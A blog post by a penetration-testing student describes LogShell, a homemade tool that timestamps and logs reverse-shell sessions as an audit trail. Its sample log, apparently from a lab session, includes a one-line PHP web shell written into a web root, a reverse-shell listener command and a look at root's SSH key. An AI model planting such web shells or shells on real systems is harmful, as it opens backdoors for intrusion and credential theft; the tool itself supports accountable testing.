I’ve recently started the “Documentation and Reporting” module on the Hack The Box Academy as part of my prep for the CPTS exam, which I should be taking soon.

I’ve always understood the importance of logging the commands executed on a target and documenting system changes during a penetration test, but the authors of this module really drove the point home with their horror stories.

Facing the wrath of an angry IT guy accusing me of wreaking havoc in critical infrastructure is definitely not on my agenda. So, I’d better ensure my commands are logged as an alibi.

The module suggested a TMUX logging plugin, but I’ve always found TMUX to be janky, with keybinding made by aliens with no concept of human hands or convention. After giving it another shot and spending some time tweaking and troubleshooting, I decided it just wasn’t for me. So, I started looking for other options.

Since I couldn’t find an exact match for what I needed, I figured I’d spend the rest of the afternoon coding one myself. I named it LogShell (a tad too close to Log4Shell, but oh well).

My goal was to create a program that I could chain alongside netcat and rlwrap to maintain the usual experience but with the bonus of logging everything whenever I wanted.

# Catching a reverse shell exactly as I would before but with logging enabled.
$ logshell rlwrap ncat -lnvp 1337

Once I’ve got a shell, every command and its output will be logged with timestamps in a file named after the target’s IP address.

┌──(user㉿kali)-[~]
└─$ cat ~/Logs/127.0.0.1.log
=============================================================
Shell session initiated at: 2024-05-30 19:48:41
=============================================================
(19:48:47) $ whoami
(19:48:47) user
(19:49:20) $ ip a
(19:49:20) eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
(19:49:20)         inet 192.168.1.10  netmask 255.255.255.0  broadcast 192.168.1.255
(19:49:20)         inet6 fe80::f816:3eff:fe21:57cf  prefixlen 64  scopeid 0x20<link>
(19:49:20)         ether f8:16:3e:21:57:cf  txqueuelen 1000  (Ethernet)
(19:49:20)         RX packets 150234  bytes 20345763 (19.4 MiB)
(19:49:20)         RX errors 0  dropped 0  overruns 0  frame 0
(19:49:20)         TX packets 134567  bytes 18320456 (17.4 MiB)
(19:49:20)         TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
(19:49:50) $ echo '<?=`$_GET[1]`?>' > /var/www/html/web-shell.php
(19:51:03) exit
=============================================================
Shell session initiated at: 2024-05-30 19:53:50
=============================================================
(19:54:01) # id
(19:54:01) uid=0(root) gid=0(root) groups=0(root)
(19:56:45) # ls -la .ssh/id_rsa
(19:56:45) -rw-------. 1 root root 0 Nov 20  2023 .ssh/id_rsa
(19:57:44) # cat flag.txt
(19:57:44) FLAG{y0u_607_m3!}

There is definetly room for improvement, so I might play around with it some more and add more features. But it’s already serviceable and will hopefully protect me from enraged network admins.

You can get LogShell on my GitHub.